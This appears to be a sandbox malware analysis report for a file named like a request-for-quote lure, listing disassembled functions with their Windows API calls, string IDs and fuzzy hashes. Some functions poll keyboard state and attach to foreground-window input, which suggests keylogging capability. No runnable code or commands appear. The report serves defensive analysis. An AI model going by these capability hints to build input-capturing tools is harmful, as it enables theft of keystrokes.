                                                        • Instruction ID: 8c269571b42c1441f814514f03b92edd351012a73d8239c9f379a0a89e1b4ae1
                                                        • Opcode Fuzzy Hash: 604ca7338ef7579289b82c182b4992e50dced26e61eee24e9e1f7f7e4088d468
                                                        • Instruction Fuzzy Hash: F6515E76A00119ABCB00DFA5DD849DEB7B9FF88704F10856EE905A7241DB749E06CBA4
                                                        Function 004447E0 Relevance: 16.6, APIs: 11, Instructions: 130keyboardCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetKeyboardState.USER32(?), ref: 0044480E
                                                        • GetAsyncKeyState.USER32(000000A0), ref: 00444899
                                                        • GetKeyState.USER32(000000A0), ref: 004448AA
                                                        • GetAsyncKeyState.USER32(000000A1), ref: 004448C8
                                                        • GetKeyState.USER32(000000A1), ref: 004448D9
                                                        • GetAsyncKeyState.USER32(00000011), ref: 004448F5
                                                        • GetKeyState.USER32(00000011), ref: 00444903
                                                        • GetAsyncKeyState.USER32(00000012), ref: 0044491F
                                                        • GetKeyState.USER32(00000012), ref: 0044492D
                                                        • GetAsyncKeyState.USER32(0000005B), ref: 00444949
                                                        • GetKeyState.USER32(0000005B), ref: 00444958
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: State$Async$Keyboard
                                                        • String ID:
                                                        • API String ID: 541375521-0
                                                        • Opcode ID: 9fce1f5b3a66d3eff563dda32bd6bc0484776d74d04e18c21d6e4f8d76764453
                                                        • Instruction ID: 827c2ee343902556a703916e37c968ecd50c133e95067caf6822082f003788d3
                                                        • Opcode Fuzzy Hash: 9fce1f5b3a66d3eff563dda32bd6bc0484776d74d04e18c21d6e4f8d76764453
                                                        • Instruction Fuzzy Hash: 27412B34A047C969FF31A6A4C8043A7BBA16FA1314F04805FD5C5477C1DBED99C8C7A9
                                                        Function 00470B6C Relevance: 16.6, APIs: 11, Instructions: 125COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: InitVariant$_malloc_wcscpy_wcslen
                                                        • String ID:
                                                        • API String ID: 3413494760-0
                                                        • Opcode ID: 6d788ec2be1997d9cec64eaa256864158e09ad3f6105efb05e468561ef8a9f6c
                                                        • Instruction ID: 93a03e1dde4748921c3f7e50244c45dc9774a8ad470eaa8d68eb3f4e8808ad8d
                                                        • Opcode Fuzzy Hash: 6d788ec2be1997d9cec64eaa256864158e09ad3f6105efb05e468561ef8a9f6c
                                                        • Instruction Fuzzy Hash: 33414BB260070AAFC754DF69C880A86BBE8FF48314F00862AE619C7750D775E564CBE5
                                                        Function 004542ED Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 271libraryloaderCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: AddressProc_free_malloc$_strcat_strlen
                                                        • String ID: AU3_FreeVar
                                                        • API String ID: 2634073740-771828931
                                                        • Opcode ID: b7b62cf44ead268743cea15c23fa0702c80810b5d7796ec40f0430e9877b9643
                                                        • Instruction ID: 8d08e60933d1045585c44e473594da8d0bbfd8a8652ecee4fcef853dc29158a1
                                                        • Opcode Fuzzy Hash: b7b62cf44ead268743cea15c23fa0702c80810b5d7796ec40f0430e9877b9643
                                                        • Instruction Fuzzy Hash: 00B1ADB4A00206DFCB00DF55C880A6AB7A5FF88319F2485AEED058F352D739ED95CB94
                                                        Function 0046C5FA Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 208comCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CoInitialize.OLE32 ref: 0046C63A
                                                        • CoUninitialize.OLE32 ref: 0046C645
                                                          • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                          • Part of subcall function 0044CB87: CreateDispTypeInfo.OLEAUT32(?,00000800,?), ref: 0044CBD4
                                                          • Part of subcall function 0044CB87: CreateStdDispatch.OLEAUT32(00000000,?,?,?), ref: 0044CBF4
                                                        • CLSIDFromProgID.OLE32(00000000,?), ref: 0046C694
                                                        • CLSIDFromString.OLE32(00000000,?), ref: 0046C6A4
                                                        • CoCreateInstance.OLE32(?,00000000,00000017,00482998,?), ref: 0046C6CD
                                                        • IIDFromString.OLE32(?,?), ref: 0046C705
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: CreateFrom$String$DispDispatchInfoInitializeInstanceProgTypeUninitialize_malloc
                                                        • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                        • API String ID: 2294789929-1287834457
                                                        • Opcode ID: 8665205133a3f3d83065b0d9f42e266eef00d51d9f24292ab734099309a65fda
                                                        • Instruction ID: adb6a6f601bf1a612e569d1fac1689f55b30b767fcafa950e0578031a668eb85
                                                        • Opcode Fuzzy Hash: 8665205133a3f3d83065b0d9f42e266eef00d51d9f24292ab734099309a65fda
                                                        • Instruction Fuzzy Hash: B861BC712043019FD710EF21D885B7BB3E8FB84715F10891EF9859B241E779E909CBAA
                                                        Function 004710F1 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 157windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00456391: GetCursorPos.USER32(?), ref: 004563A6
                                                          • Part of subcall function 00456391: ScreenToClient.USER32(?,?), ref: 004563C3
                                                          • Part of subcall function 00456391: GetAsyncKeyState.USER32(?), ref: 00456400
                                                          • Part of subcall function 00456391: GetAsyncKeyState.USER32(?), ref: 00456410
                                                        • DefDlgProcW.USER32(?,00000205,?,?), ref: 00471145
                                                        • ImageList_DragLeave.COMCTL32(00000000), ref: 00471163
                                                        • ImageList_EndDrag.COMCTL32 ref: 00471169
                                                        • ReleaseCapture.USER32 ref: 0047116F
                                                        • SetWindowTextW.USER32(?,00000000), ref: 00471206
                                                        • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00471216
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: AsyncDragImageList_State$CaptureClientCursorLeaveMessageProcReleaseScreenSendTextWindow
                                                        • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                                        • API String ID: 2483343779-2107944366
                                                        • Opcode ID: 0c0f1ff16893fa866466cf5bd33a163e2c592d09522a7afef5934b76f638d362
                                                        • Instruction ID: f70d9246110d4513cc5ea0640624bfdb04bec8758509bedf4130776013c57ff9
                                                        • Opcode Fuzzy Hash: 0c0f1ff16893fa866466cf5bd33a163e2c592d09522a7afef5934b76f638d362
                                                        • Instruction Fuzzy Hash: D751E5706002109FD700EF59CC85BAF77A5FB89310F004A6EF945A72E2DB789D45CBAA
                                                        Function 004505F0 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 147windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 004506A0
                                                        • SendMessageW.USER32(00000000,00001036,00000000,?), ref: 004506B4
                                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 004506D5
                                                        • _wcslen.LIBCMT ref: 00450720
                                                        • _wcscat.LIBCMT ref: 00450733
                                                        • SendMessageW.USER32(?,00001057,00000000,?), ref: 0045074C
                                                        • SendMessageW.USER32(?,00001061,?,?), ref: 0045077E
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$Window_wcscat_wcslen
                                                        • String ID: -----$SysListView32
                                                        • API String ID: 4008455318-3975388722
                                                        • Opcode ID: ffec743b0eb36e838b163f32d05296d45530ca8b23685d337e61e8ea6b23e255
                                                        • Instruction ID: d83f74bd31ff7b91e94eebeff09b40632409ca0fd113a8de7250d6f1aa6a1b31
                                                        • Opcode Fuzzy Hash: ffec743b0eb36e838b163f32d05296d45530ca8b23685d337e61e8ea6b23e255
                                                        • Instruction Fuzzy Hash: 9C51D470500308ABDB24CF64CD89FEE77A5EF98304F10065EF944A72C2D3B99959CB58
                                                        Function 00469BF3 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 88windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                          • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                        • SendMessageW.USER32(00000000,0000018C,000000FF,00000000), ref: 00469C73
                                                        • GetDlgCtrlID.USER32(00000000), ref: 00469C84
                                                        • GetParent.USER32 ref: 00469C98
                                                        • SendMessageW.USER32(00000000,?,00000111), ref: 00469C9F
                                                        • GetDlgCtrlID.USER32(00000000), ref: 00469CA5
                                                        • GetParent.USER32 ref: 00469CBC
                                                        • SendMessageW.USER32(00000000,?,00000111,?), ref: 00469CC3
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$CtrlParent$_memmove_wcslen
                                                        • String ID: ComboBox$ListBox
                                                        • API String ID: 2360848162-1403004172
                                                        • Opcode ID: 7a27601cbaa80f740c595597d901cdf30e8ed390f6d586fa417b55efe09de5c4
                                                        • Instruction ID: b77daa4920d68b7dc7b38413de7e2b04daab878370679d8231203fb1b5b646ea
                                                        • Opcode Fuzzy Hash: 7a27601cbaa80f740c595597d901cdf30e8ed390f6d586fa417b55efe09de5c4
                                                        • Instruction Fuzzy Hash: 0121E7716001187BDB00AB69CC85ABF779CEB85320F00855BFA149B2D1D6B8D845C7A5
                                                        Function 0045DC4C Relevance: 15.2, APIs: 10, Instructions: 190COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: _wcscpy$FolderUninitialize$BrowseDesktopFromInitializeListMallocPath
                                                        • String ID:
                                                        • API String ID: 262282135-0
                                                        • Opcode ID: 6572a5b0ab20a3b352b20f616e179ebe31bc85c3400954ff5f88a0c3e804af97
                                                        • Instruction ID: f209a7e015878e5ef66622a864ec89938c936514b9877fb167e893f071c19078
                                                        • Opcode Fuzzy Hash: 6572a5b0ab20a3b352b20f616e179ebe31bc85c3400954ff5f88a0c3e804af97
                                                        • Instruction Fuzzy Hash: 25718275900208AFCB14EF95C9849DEB7B9EF88304F00899AE9099B312D735EE45CF64
                                                        Function 00448123 Relevance: 15.2, APIs: 10, Instructions: 187windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 004481A8
                                                        • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 004481AB
                                                        • GetWindowLongW.USER32(?,000000F0), ref: 004481CF
                                                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004481F2
                                                        • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00448266
                                                        • SendMessageW.USER32(?,00001074,?,00000007), ref: 004482B4
                                                        • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 004482CF
                                                        • SendMessageW.USER32(?,0000101D,00000001,00000000), ref: 004482F1
                                                        • SendMessageW.USER32(?,0000101E,00000001,?), ref: 00448308
                                                        • SendMessageW.USER32(?,00001008,?,00000007), ref: 00448320
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$LongWindow
                                                        • String ID:
                                                        • API String ID: 312131281-0
                                                        • Opcode ID: 6a3a0ce9ab1f2311975bf00a061da1b0f9e556c56634a45a126b5d9c196b7e2c
                                                        • Instruction ID: c7c5d5d6f9bf0949bb943eac7ac5a8ec30049dd2ce11923e35461b50cec8bdb0
                                                        • Opcode Fuzzy Hash: 6a3a0ce9ab1f2311975bf00a061da1b0f9e556c56634a45a126b5d9c196b7e2c
                                                        • Instruction Fuzzy Hash: 97617C70A00208AFEB10DF94DC81FEE77B9FF49714F10429AF914AB291DBB5AA41CB54
                                                        Function 00448D62 Relevance: 15.2, APIs: 10, Instructions: 174windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 004413AA: DeleteObject.GDI32(?), ref: 0044140B
                                                        • SendMessageW.USER32(75C123D0,00001001,00000000,?), ref: 00448E16
                                                        • SendMessageW.USER32(75C123D0,00001026,00000000,?), ref: 00448E25
                                                          • Part of subcall function 00441432: CreateSolidBrush.GDI32(?), ref: 0044147E
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$BrushCreateDeleteObjectSolid
                                                        • String ID:
                                                        • API String ID: 3771399671-0
                                                        • Opcode ID: 36703352345276820fdd923f04099b07a85a16fcace37fcd15d9f96d3dbdb764
                                                        • Instruction ID: 7c26134f999fedcb31daf2d1c178305a5bad5d5d588b7e0560cc3c70a69cf84e
                                                        • Opcode Fuzzy Hash: 36703352345276820fdd923f04099b07a85a16fcace37fcd15d9f96d3dbdb764
                                                        • Instruction Fuzzy Hash: C7511570300214ABF720DF24DC85FAE77A9EF14724F10491EFA59AB291CB79E9498B18
                                                        Function 00434621 Relevance: 15.1, APIs: 10, Instructions: 98threadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetCurrentThreadId.KERNEL32 ref: 00434643
                                                        • GetForegroundWindow.USER32(00000000), ref: 00434655
                                                        • GetWindowThreadProcessId.USER32(00000000), ref: 0043465C
                                                        • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 00434671
                                                        • GetWindowThreadProcessId.USER32(?,?), ref: 0043467F
                                                        • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 00434698
                                                        • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004346A6
                                                        • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 004346F3
                                                        • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00434707
                                                        • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00434712
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                        • String ID:
                                                        • API String ID: 2156557900-0
                                                        • Opcode ID: 67cee910062edc5350ae4d2b9d1366d6ad4b01d413104696f98c87e4c7643c1b
                                                        • Instruction ID: 33c2ceff45d8cb0672f592c0823183733d26e7ad7419b63083ab10cfbc882f35
                                                        • Opcode Fuzzy Hash: 67cee910062edc5350ae4d2b9d1366d6ad4b01d413104696f98c87e4c7643c1b
                                                        • Instruction Fuzzy Hash: 98313EB2600204BFDB11DF69DC859AEB7A9FB9A310F00552AF905D7250E778AD40CB6C
                                                        Function 0046943F Relevance: 14.3, APIs: 2, Strings: 6, Instructions: 287COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                        • API String ID: 0-1603158881
                                                        • Opcode ID: b2205c720eb57eaa9acd20c5cdad8c47631596d61f09c649adc7dd6ac6f1094b
                                                        • Instruction ID: 400245e8055df5988f0e80dfbae95eacb55e3b8a933f722a5dc1e2c8929bf265
                                                        • Opcode Fuzzy Hash: b2205c720eb57eaa9acd20c5cdad8c47631596d61f09c649adc7dd6ac6f1094b
                                                        • Instruction Fuzzy Hash: FAA162B5800204ABDF00EF61D8C1BEA3368AF54349F58857BEC096B146EB7D6909D77A
                                                        Function 004485CB Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 109windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CreateMenu.USER32 ref: 00448603
                                                        • SetMenu.USER32(?,00000000), ref: 00448613
                                                        • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00448697
                                                        • IsMenu.USER32(?), ref: 004486AB
                                                        • CreatePopupMenu.USER32 ref: 004486B5
                                                        • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 004486EC
                                                        • DrawMenuBar.USER32 ref: 004486F5
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: Menu$CreateItem$DrawInfoInsertPopup
                                                        • String ID: 0
                                                        • API String ID: 161812096-4108050209
                                                        • Opcode ID: 5f9c542d8f07ae56d95057f828c3334b95156dd137b7db0efda9360fb5a3d221
                                                        • Instruction ID: 1651b4fd0bf3e4e6d8e032b2651979207be8780685d2f09cc615cc8e1c1775d8
                                                        • Opcode Fuzzy Hash: 5f9c542d8f07ae56d95057f828c3334b95156dd137b7db0efda9360fb5a3d221
                                                        • Instruction Fuzzy Hash: 9D418B75A01209AFEB40DF98D884ADEB7B4FF49314F10815EED189B340DB74A851CFA8
